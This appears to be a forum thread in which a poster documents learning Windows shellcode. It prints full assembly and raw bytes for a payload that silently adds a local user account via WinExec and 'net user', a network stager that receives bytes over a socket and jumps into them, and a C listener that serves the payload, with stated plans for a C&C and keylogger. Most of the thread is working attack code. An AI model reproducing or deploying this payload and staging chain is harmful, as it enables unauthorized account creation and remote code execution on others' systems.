
Thread: My shellcode trail and error diary

    Default My shellcode trail and error diary

    I'm trying to learn how to write shellcode. I'm planning on recording my trials and errors in a diary of sorts,
    in the hope that it helps others.

    The software I'm using is Borland C++ (TASM for the inline assembly) with the Code::Blocks IDE, on Windows Server 2003.

    The shellcode calls the WinExec function with the parameters WinExec("cmd.exe /c net user laser laserpass /ADD",0);
    i.e. the payload adds a local user account "laser". Annotated listing below, followed by the stack as seen in the IDA disassembly:

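    // Executes WinExec("cmd.exe /c net user laser laserpass /ADD", 0).
    // Shellcode cannot reference static data, so the command string travels
    // with the code: it is materialised on the stack four bytes at a time,
    // last chunk first, so that it reads forward from esp afterwards. The
    // text is exactly 40 bytes (10 dwords) plus one dword of NUL terminator.
    asm xor esi ,esi;
    asm push esi;               // NUL terminator (pushed first, so it ends up after the text)
    asm mov esi ,0x4444412F;    // "/ADD"
    asm push esi;
    asm mov esi ,0x20737361;    // "ass "
    asm push esi;
    asm mov esi ,0x70726573;    // "serp"
    asm push esi;
    asm mov esi ,0x616C2072;    // "r la"
    asm push esi;
    asm mov esi ,0x6573616C;    // "lase"
    asm push esi;
    asm mov esi ,0x20726573;    // "ser "
    asm push esi;
    asm mov esi ,0x75207465;    // "et u"
    asm push esi;
    asm mov esi ,0x6E20632F;    // "/c n"
    asm push esi;
    asm mov esi ,0x20657865;    // "exe "
    asm push esi;
    asm mov esi ,0x2E646D63;    // "cmd."
    asm push esi;
    asm mov ecx ,esp;           // ecx = &"cmd.exe /c ..." -- pass the ADDRESS of the string.
                                // An earlier attempt passed its first dword (0x2E646D63)
                                // instead, which WinExec then tried to dereference.
    asm xor eax ,eax;
    asm push eax;               // uCmdShow = 0 (SW_HIDE); lands at 0012FF78 in the dump below
    asm mov ebx ,ecx;
    asm push ebx;               // lpCmdLine = pointer to the string; 0012FF74 -> 0012FF7C below
    asm mov ebx ,0x77ea411e;    // WinExec, absolute address read from a disassembly of a C
    asm call ebx;               // program that calls it (it shows up in the functions table).
                                // kernel32 is mapped in every process and 2k3 has no ASLR,
                                // but this address is specific to one kernel32 build: it
                                // changes with service packs and hotfixes.
    asm add esp ,44;            // discard the 11 dwords pushed for the string. WinExec is
                                // stdcall and pops only its own two arguments; without this
                                // the pop/pop/pop/ret epilogue that follows in the compiled
                                // bytes returns into the command text ("et u" = 0x75207465).
    // The IDA stack dump below was taken from a shorter WinExec("cmd.exe") run
    // (only "cmd." and "exe\0" sit at 0012FF7C), but the layout is the same:
    // 0012FF74 holds the pointer to the string, 0012FF78 the zero uCmdShow.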
    0012FF54 dd    407116h ; __create_lock+62
    0012FF58 dd    40BDB0h ; .data:CriticalSection
    0012FF5C dd    12FF90h ; Stack[00000A48]:retaddr
    0012FF60 dd    406C8Bh ; sub_406C7C+F
    0012FF64 dd    40BD90h ; .data:___exit_lock
    0012FF68 dd    40AC68h ; .data:aCreatingAtexit
    0012FF6C dd    406BA5h ; __init_exit_proc:loc_406BA5
    0012FF70 dd          0
    0012FF74 dd    12FF7Ch
    0012FF78 dd          0
    0012FF7C dd  2E646D63h ; cmd.
    0012FF80 dd    657865h ; exe
    0012FF84 dd    4090DCh ; .data:off_4090DC
    0012FF88 dd  7FFD4000h
    0012FF8C saved_fp dd    12FFB8h ; Stack[00000A48]:saved_fp
    0012FF90 retaddr dd    406E02h ; __startup+172
    0012FF94 argc dd 1
    To test the shellcode, use a C program like the one below (it keeps the bytes in an array and calls them as a function):

    #include <stdio.h>

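    int main(void) {
        /* Raw bytes of the WinExec stub above, ending in the compiler's
           pop esi / pop ebx / pop ebp / ret epilogue (5e 5b 5d c3) and a nop.
           The "\ x" splits in the original paste were line-wrap damage that
           turned several escapes into invalid "\ " sequences; every byte is a
           plain "\xNN" here. */
        char scode[] = "\x56\x33\xf6\x56"
        "\xbe\x2f\x41\x44\x44\x56\xbe\x61\x73\x73\x20\x56\xbe\x73\x65\x72"
        "\x70\x56\xbe\x72\x20\x6c\x61\x56\xbe\x6c\x61\x73\x65\x56\xbe\x73\x65\x72\x20\x56"
        "\xbe\x65\x74\x20\x75\x56\xbe\x2f\x63\x20\x6e\x56\xbe\x65\x78\x65\x20\x56\xbe\x63"
        "\x6d\x64\x2e\x56\x33\xf6\x8b\xcc\x33\xc0\x50\x33\xdb\x8b\xd9\x53\x33\xdb\xbb\x1e"
        "\x41\xea\x77\xff\xd3\x33\xdb\x33\xc0\x33\xc0\x5e\x5b\x5d\xc3\x90";

        int (*func)();
        func = (int (*)()) scode;

        /* NOTE(review): scode lives on the stack. If DEP is enabled on this
           2k3 box the call faults before the first byte runs; copy the bytes
           into memory obtained with VirtualAlloc(..., PAGE_EXECUTE_READWRITE)
           first. Also, as posted the stub leaves its pushed string on the
           stack before its pop/ret epilogue, so do not expect a clean return
           from this call once the command has run. */
        func();
        return 0;
    }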

    My next project will be a stager and a C&C, so I can send the shellcode above over the network and have it executed.
    Last edited by pigtail; 01-24-2010 at 11:57 PM. Reason: Readibility edit

    Default Re: My shellcode trail and error diary

    Creating a stager is a lot more difficult than I thought at first; these links were of great help:
    "" & "" (the URLs were lost in the paste). I learnt that to call a function like func(string[40]) from shellcode
    you move esp by 40 (asm sub esp ,40) and then push the address of the bottom of that space. Assembly doesn't understand
    static buffers or structs; you just make room for them on the stack (e.g. int one = 0x04).
    I also learnt that most functions that don't return a value leave most registers unchanged when they return.
    (More precisely, on Win32 stdcall/cdecl calls preserve ebx, esi, edi and ebp but may clobber eax, ecx and edx,
    which is why the code below keeps the socket handle in ebx across the calls.)

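    // Stager: LoadLibrary("WSOCK32.DLL"), WSAStartup, create a socket, connect
    // to 127.0.0.1:5555, recv up to 2000 bytes onto the stack and jump into
    // them. Every API is reached through a hard-coded absolute address, so
    // this only runs on the exact 2k3 build the addresses were read from
    // (no ASLR there, but they change with service packs and hotfixes).
    asm xor eax ,eax;
    asm xor ebx ,ebx;
    asm mov esi ,0x4C4C44;      // "DLL\0"  -- "WSOCK32.DLL" pushed in 4-byte chunks,
    asm push esi;               //             last chunk first so it reads forward in memory
    asm mov esi ,0x2E32334B;    // "K32."
    asm push esi;
    asm mov esi ,0x434F5357;    // "WSOC"
    asm push esi;
    asm mov ebx ,esp;           // ebx = &"WSOCK32.DLL", LoadLibrary's only argument
    asm push ebx;
    asm mov ecx ,0x77e41dc6;    // LoadLibrary (hard-coded); the returned module handle is ignored
    asm call ecx;

    asm sub esp ,400;           // room for the WSADATA out-parameter (400 bytes on 32-bit Windows).
                                // This must be the full 32-bit esp: the original `sub sp ,400`
                                // only touched the low 16 bits, so whenever they were below 400
                                // esp wrapped UPWARD within the same 64K and the buffer landed
                                // above the live stack.
    asm push esp;               // lpWSAData (push esp stores the pre-decrement value = buffer base)
    asm push 0x101;             // wVersionRequested = 1.1
    asm mov ecx ,0x71c04f3b;    // WSAStartup (hard-coded, annotated as wsock32)
    asm call ecx;

    asm xor eax ,eax;
    asm push eax;               // dwFlags = 0        -- argument sequence 2,1,0,0,0,0 is the
    asm push eax;               // g = 0                 WSASocketA(af,type,protocol,NULL,0,0)
    asm push eax;               // lpProtocolInfo = 0    shape copied from Metasploit
    asm push eax;               // protocol = 0
    asm sub eax ,0xffffffff;    // eax = 1 (sub -1 == inc, kept from the Metasploit source)
    asm push eax;               // type = SOCK_STREAM (1)
    asm sub eax ,0xffffffff;    // eax = 2
    asm push eax;               // af = AF_INET (2)
    asm mov ecx ,0x71c0410c;    // annotated as socket(). If this really is socket() it consumes
    asm call ecx;               // only the first three arguments and the other 12 bytes stay on
                                // the stack; the six pushes match WSASocketA.
    asm mov ebx ,eax;           // ebx = socket handle. INVALID_SOCKET (-1) is never checked.

    asm push 0x0100007f;        // sin_addr = 127.0.0.1, already in network byte order (7f 00 00 01)
    asm push 0xb3150002;        // sin_port = htons(5555) = 0x15b3, sin_family = AF_INET (2)
    asm mov ecx ,esp;           // ecx = &sockaddr_in, built raw so no inet_addr/htons calls are
                                // needed. Only 8 of its 16 bytes are written; sin_zero is
                                // whatever was already on the stack above it.
    asm push byte 0x10;         // namelen = sizeof(sockaddr_in) = 16
    asm push ecx;               // name
    asm push ebx;               // s
    asm mov ecx ,0x71c0446a;    // connect (hard-coded). The return value is not checked, so a
    asm call ecx;               // refused connection still falls through to recv below.

    asm xor eax ,eax;
    asm mov edi ,2000;          // len: 2000-byte receive buffer for the incoming shellcode
    asm sub esp ,edi;           // carve the buffer out of the stack ...
    asm mov ebp , esp;          // ... and remember its base. This clobbers the frame pointer,
                                // which is only acceptable because jmp esp below never returns.
    asm push eax;               // flags = 0
    asm push edi;               // len = 2000
    asm push ebp;               // buf = bottom of the buffer
    asm push ebx;               // s = socket handle from above
    asm mov ecx ,0x71bb1120;    // recv (hard-coded, annotated as wsock32)
    asm call ecx;

    // recv is stdcall: once it has popped its four arguments esp is back at
    // the buffer base, so whatever arrived is at esp. Nothing checks eax:
    // a closed connection (0 or -1) or a short read (TCP may deliver the
    // 2000 bytes in several segments) jumps into uninitialised stack, and
    // with DEP enabled the stack is not executable at all.
    asm jmp esp;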

    I still have more to learn before I can do this without help from other web sites.
    Next I'm going to try a fork()-style block (on Windows that means a new thread or process), so the shellcode
    that gets sent has its own area to run in, which should help with the keylogger code after that.

    post two.......two

    Default Re: My shellcode trail and error diary

    This is the command-and-control (C&C) listener I will be using; it listens on port 5555 and the stager above connects to it:
    #include <winsock2.h>   /* must precede windows.h, which otherwise pulls in winsock.h and the two clash */
    #include <windows.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
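    int main(void) {
        WSADATA wsaData;
        SOCKET listener, client;
        struct sockaddr_in service;
        /* Payload for the stager in post #2, which recv()s up to 2000 bytes
           onto its stack and jmp esp's into them. These are the 96 bytes of
           the WinExec stub from post #1, as posted (see the stack-balance
           note on that listing before relying on a clean return). */
        unsigned char scode[] = "\x56\x33\xf6\x56"
        "\xbe\x2f\x41\x44\x44\x56\xbe\x61\x73\x73\x20\x56\xbe\x73\x65\x72"
        "\x70\x56\xbe\x72\x20\x6c\x61\x56\xbe\x6c\x61\x73\x65\x56\xbe\x73\x65\x72\x20\x56"
        "\xbe\x65\x74\x20\x75\x56\xbe\x2f\x63\x20\x6e\x56\xbe\x65\x78\x65\x20\x56\xbe\x63"
        "\x6d\x64\x2e\x56\x33\xf6\x8b\xcc\x33\xc0\x50\x33\xdb\x8b\xd9\x53\x33\xdb\xbb\x1e"
        "\x41\xea\x77\xff\xd3\x33\xdb\x33\xc0\x33\xc0\x5e\x5b\x5d\xc3\x90";
        int sent;

        /* socket() fails with WSANOTINITIALISED unless Winsock is started;
           the original listing built the version word but never made the call. */
        if (WSAStartup(MAKEWORD(2, 2), &wsaData) != 0) {
            fprintf(stderr, "WSAStartup failed: %d\n", WSAGetLastError());
            return 1;
        }

        listener = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
        if (listener == INVALID_SOCKET) {
            fprintf(stderr, "socket failed: %d\n", WSAGetLastError());
            WSACleanup();
            return 1;
        }

        memset(&service, 0, sizeof(service));
        service.sin_family = AF_INET;
        /* The stager connects to 127.0.0.1:5555, so listen on loopback only:
           anything that can reach this port is handed the payload. (The
           address in the original paste was lost; inet_addr("") returns
           INADDR_NONE, which bind() would most likely have rejected.) */
        service.sin_addr.s_addr = inet_addr("127.0.0.1");
        service.sin_port = htons(5555);

        if (bind(listener, (SOCKADDR *)&service, sizeof(service)) == SOCKET_ERROR ||
            listen(listener, 10) == SOCKET_ERROR) {
            fprintf(stderr, "bind/listen failed: %d\n", WSAGetLastError());
            closesocket(listener);
            WSACleanup();
            return 1;
        }

        /* One client, then exit: this is a test harness, not a daemon. */
        client = accept(listener, NULL, NULL);
        if (client == INVALID_SOCKET) {
            fprintf(stderr, "accept failed: %d\n", WSAGetLastError());
            closesocket(listener);
            WSACleanup();
            return 1;
        }

        /* Direction matters: the stager recv()s, so this side send()s. The
           string literal's trailing NUL is not part of the payload. */
        sent = send(client, (const char *)scode, (int)(sizeof(scode) - 1), 0);
        if (sent == SOCKET_ERROR)
            fprintf(stderr, "send failed: %d\n", WSAGetLastError());
        else
            printf("sent %d payload bytes\n", sent);

        closesocket(client);
        closesocket(listener);
        WSACleanup();
        return sent == SOCKET_ERROR ? 1 : 0;
    }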
